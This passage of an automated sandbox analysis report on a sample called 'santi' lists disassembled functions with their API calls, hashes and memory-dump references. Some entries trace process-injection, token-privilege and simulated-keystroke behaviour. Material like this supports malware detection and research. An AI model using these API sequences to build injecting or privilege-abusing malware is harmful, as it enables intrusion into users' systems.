                                                                • Opcode Fuzzy Hash: 8b053fdc7569cf1c5f58b5269928c1ddb49102942837d24dc534b2f06710c48d
                                                                • Instruction Fuzzy Hash: 92F0283150521E67DB02BF98DD129EEB7AC9F00394F648035FA04D61C5CBF0D65086A5
                                                                Function 003035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __lock_file.LIBCMT ref: 00303629
                                                                  • Part of subcall function 00304E1C: __lock.LIBCMT ref: 00304E3F
                                                                • __fclose_nolock.LIBCMT ref: 00303634
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                • String ID:
                                                                • API String ID: 2800547568-0
                                                                • Opcode ID: 20310ba69a5380a7593964530f71ba5826e07c192876141cb9637a70b905b5fb
                                                                • Instruction ID: 50c5d6ce8e84af72c20518f715d454873b5753f75cff03971967ff498c569d1d
                                                                • Opcode Fuzzy Hash: 20310ba69a5380a7593964530f71ba5826e07c192876141cb9637a70b905b5fb
                                                                • Instruction Fuzzy Hash: 9AF0BB71943708AAD7137B69C86775EB6A85F41330F258108E450AF2D1CB7C8701DF55
                                                                Function 00E1620D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00E169CB
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E16A61
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E16A83
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                • Instruction ID: e598e7deb5e0f2bfe42dc5ee945e193ddaaa5d9a2f4a53b4e007db11da84a931
                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                • Instruction Fuzzy Hash: 9512DE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                                Function 00302957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __flush.LIBCMT ref: 00302A0B
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __flush__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 4101623367-0
                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                • Instruction ID: 445557ce4be67eb92da991844261c75e55383a1679f1f4de7b0396beb5b4cc4b
                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                • Instruction Fuzzy Hash: 5941A4317027069FDF2A8E69C8A95AF77BAAF44360B25853DE855CB2C0EF70DD518B40
                                                                Function 002FED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction ID: 539fdfdb5aeeec344412e415a0815360c22beede91ebf62e2501bbacae24450f
                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction Fuzzy Hash: 6D31EA70A1010ADBCB1ADF18C480979F7A9FF49380B6586B5E509CBB65DB31EDD1CB80
                                                                Function 002E41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E4214: FreeLibrary.KERNEL32(00000000,?), ref: 002E4247
                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002E39FE,?,00000001), ref: 002E41DB
                                                                  • Part of subcall function 002E4291: FreeLibrary.KERNEL32(00000000), ref: 002E42C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Library$Free$Load
                                                                • String ID:
                                                                • API String ID: 2391024519-0
                                                                • Opcode ID: 64646fe4f56041e312bcbe340b1e06ff809c1fe2030bb233f72d76903b4256b0
                                                                • Instruction ID: 37b735857ab1917e0ab4ae0b41bfd96029ba76e057a5d6b0468a9ece6e2fb2f6
                                                                • Opcode Fuzzy Hash: 64646fe4f56041e312bcbe340b1e06ff809c1fe2030bb233f72d76903b4256b0
                                                                • Instruction Fuzzy Hash: 14113A31760305BBCB11BB76DC12F9E77A89F40700F508429FA92AA0C1DF74EA249F60
                                                                Function 0030AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___lock_fhandle.LIBCMT ref: 0030AFC0
                                                                  • Part of subcall function 00307BDA: __getptd_noexit.LIBCMT ref: 00307BDA
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                • String ID:
                                                                • API String ID: 1144279405-0
                                                                • Opcode ID: 5cbf4d3fd4589a970f72ce187346cedf1dc15983d110d1f30cc088e26a45ee2a
                                                                • Instruction ID: 25764459c417fb8d7afe045d397f8f754655f3b0da0050782498728d098cb146
                                                                • Opcode Fuzzy Hash: 5cbf4d3fd4589a970f72ce187346cedf1dc15983d110d1f30cc088e26a45ee2a
                                                                • Instruction Fuzzy Hash: DE1191729076009FE713BFA8D86275ABB64AF42331F164640E4741F1E2D7B59D109BA1
                                                                Function 002E39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                • Instruction ID: 5174b8198589201dccd3466a9634365dc8f85b00477ff15edefb56178bac9cfe
                                                                • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                • Instruction Fuzzy Hash: 0101A43145014DAFCF05EFA5C892CFFBB74EF21304F40802AB926971A5EA309A99DF60
                                                                Function 00302AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __lock_file.LIBCMT ref: 00302AED
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit__lock_file
                                                                • String ID:
                                                                • API String ID: 2597487223-0
                                                                • Opcode ID: b8892e5d593a109b7efba3f8007460f3bb74599eea11059cfecd7a08175c8786
                                                                • Instruction ID: e15e44b82064bce0a5082668f1cff303a8e47872a451c8c2f6042cea8b85bbeb
                                                                • Opcode Fuzzy Hash: b8892e5d593a109b7efba3f8007460f3bb74599eea11059cfecd7a08175c8786
                                                                • Instruction Fuzzy Hash: 84F06D31A02205AADF23AFA9CC1A79F7AA5BF00320F158415F4149E1E1DF788A62DB91
                                                                Function 002E4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,002E39FE,?,00000001), ref: 002E4286
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 9c3c90c628061e3fb37ef529d9666c04ebaa10b05d4adc65da4686a41c971804
                                                                • Instruction ID: 2137d7402f65a7549206cb38a82f22c69e3c7dcd32ce88ee16565418e9e2a82a
                                                                • Opcode Fuzzy Hash: 9c3c90c628061e3fb37ef529d9666c04ebaa10b05d4adc65da4686a41c971804
                                                                • Instruction Fuzzy Hash: 0CF0A070565342CFCB34AF62D894812B7E4BF043153208A7EF6C682510C3B19850CF40
                                                                Function 002E40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002E40C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID:
                                                                • API String ID: 82841172-0
                                                                • Opcode ID: 9815b1245579cc68e230900e4da3ec9f2807685c9d50415f90f8447403d6385c
                                                                • Instruction ID: fa303f96235db06294bb8c326411e4be483655494fdc36e40ec3dda66bcfdc39
                                                                • Opcode Fuzzy Hash: 9815b1245579cc68e230900e4da3ec9f2807685c9d50415f90f8447403d6385c
                                                                • Instruction Fuzzy Hash: 54E0CD36A001245BC7129755CC46FEE779DDF88790F054175F905D7344D9A499818690
                                                                Function 00E1720C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction ID: 0c968689108ad33790e85ca69d18611254f676d9488cd53f825db6de0419b668
                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction Fuzzy Hash: 42E0BF7494410DEFDB00EFA4D9496DE7BB4EF04701F1005A1FD05E7691DB309E54CA62
                                                                Function 00E17210 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction ID: d54b5cc57b3caf505e1b95ae56c1ee42d9882f0334fdddfffa797d2e6cb28765
                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction Fuzzy Hash: 3AE0E67494410DDFDB00EFB4D9496DE7FB4EF04701F100161FD01E2281D6309D50CA62

                                                                Non-executed Functions

                                                                Function 0034AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0034B1CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: %d/%02d/%02d
                                                                • API String ID: 3850602802-328681919
                                                                • Opcode ID: 38a04fec3fba7e7ccab9f1047492ce39d67c52493417a00358514e1f74bf00c9
                                                                • Instruction ID: ad38b242f547e9f013581050a51a246180fc78d3d17551135f767b8de17a05b8
                                                                • Opcode Fuzzy Hash: 38a04fec3fba7e7ccab9f1047492ce39d67c52493417a00358514e1f74bf00c9
                                                                • Instruction Fuzzy Hash: 4C12B071640608ABEB268F65CC49FAABBF8FF45750F108119F916DF2D1DBB0A941CB21
                                                                Function 002FEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 002FEB4A
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00353AEA
                                                                • IsIconic.USER32(000000FF), ref: 00353AF3
                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00353B00
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353B0A
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00353B20
                                                                • GetCurrentThreadId.KERNEL32 ref: 00353B27
                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00353B33
                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00353B44
                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00353B4C
                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00353B54
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353B57
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B6C
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B77
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B81
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B86
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B8F
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B94
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B9E
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353BA3
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353BA6
                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00353BCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 4125248594-2988720461
                                                                • Opcode ID: 30fdb5774a9e38c9de77bc8934d7884d6569bd4bf8bb8385f815d1f279474c47
                                                                • Instruction ID: be3a1474df97ef71d4f714c1b52dc8fca9698082aa6976706622bff3326ad3aa
                                                                • Opcode Fuzzy Hash: 30fdb5774a9e38c9de77bc8934d7884d6569bd4bf8bb8385f815d1f279474c47
                                                                • Instruction Fuzzy Hash: 9C31A6B1F403187BEB225B658C49F7F7E6CEB45B90F118015FE05EA1E0D6F05D00AAA0
                                                                Function 0031ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                  • Part of subcall function 0031B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                  • Part of subcall function 0031B134: GetLastError.KERNEL32 ref: 0031B1BA
                                                                • _memset.LIBCMT ref: 0031AD08
                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0031AD5A
                                                                • CloseHandle.KERNEL32(?), ref: 0031AD6B
                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0031AD82
                                                                • GetProcessWindowStation.USER32 ref: 0031AD9B
                                                                • SetProcessWindowStation.USER32(00000000), ref: 0031ADA5
                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0031ADBF
                                                                  • Part of subcall function 0031AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0031ACC0), ref: 0031AB99
                                                                  • Part of subcall function 0031AB84: CloseHandle.KERNEL32(?,?,0031ACC0), ref: 0031ABAB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                • String ID: $H*9$default$winsta0
                                                                • API String ID: 2063423040-193336070
                                                                • Opcode ID: d1d5f561fc3f496a7da9c7beac1babe68b3e5bb0c47ee0e495ed99e1c2f78de2
                                                                • Instruction ID: 9b262a6b52552cec0d7d9b09d58df5f4252ce676475a7f9cd4da0b44d48f9d86
                                                                • Opcode Fuzzy Hash: d1d5f561fc3f496a7da9c7beac1babe68b3e5bb0c47ee0e495ed99e1c2f78de2
                                                                • Instruction Fuzzy Hash: B381CC71902209AFDF16DFA4CC48AEEBBBCEF08345F058129F814A6161D7718E95DB72
                                                                Function 003260DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00325FA6,?), ref: 00326EF1
                                                                  • Part of subcall function 0032725E: __wsplitpath.LIBCMT ref: 0032727B
                                                                  • Part of subcall function 0032725E: __wsplitpath.LIBCMT ref: 0032728E
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • _wcscat.LIBCMT ref: 00326149
                                                                • _wcscat.LIBCMT ref: 00326167
                                                                • __wsplitpath.LIBCMT ref: 0032618E
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003261A4
                                                                • _wcscpy.LIBCMT ref: 00326209
                                                                • _wcscat.LIBCMT ref: 0032621C
                                                                • _wcscat.LIBCMT ref: 0032622F
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0032625D
                                                                • DeleteFileW.KERNEL32(?), ref: 0032626E
                                                                • MoveFileW.KERNEL32(?,?), ref: 00326289
                                                                • MoveFileW.KERNEL32(?,?), ref: 00326298
                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 003262AD
                                                                • DeleteFileW.KERNEL32(?), ref: 003262BE
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003262E1
                                                                • FindClose.KERNEL32(00000000), ref: 003262FD
                                                                • FindClose.KERNEL32(00000000), ref: 0032630B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                • String ID: \*.*
                                                                • API String ID: 1917200108-1173974218
                                                                • Opcode ID: 33c5d3979400d070ab4e3ff9499cac64c9f2a870601eb3635b76c86895e550ea
                                                                • Instruction ID: f03ff83258aa92f9e3ea418c2ac781a8dcf7b2c8cc06ba2fbc3ce9df8e1af6ae
                                                                • Opcode Fuzzy Hash: 33c5d3979400d070ab4e3ff9499cac64c9f2a870601eb3635b76c86895e550ea
                                                                • Instruction Fuzzy Hash: A3517372D0822CAACB22EB91DC45DEF77BCAF05300F0544EAE585E7141DE72A7498FA4
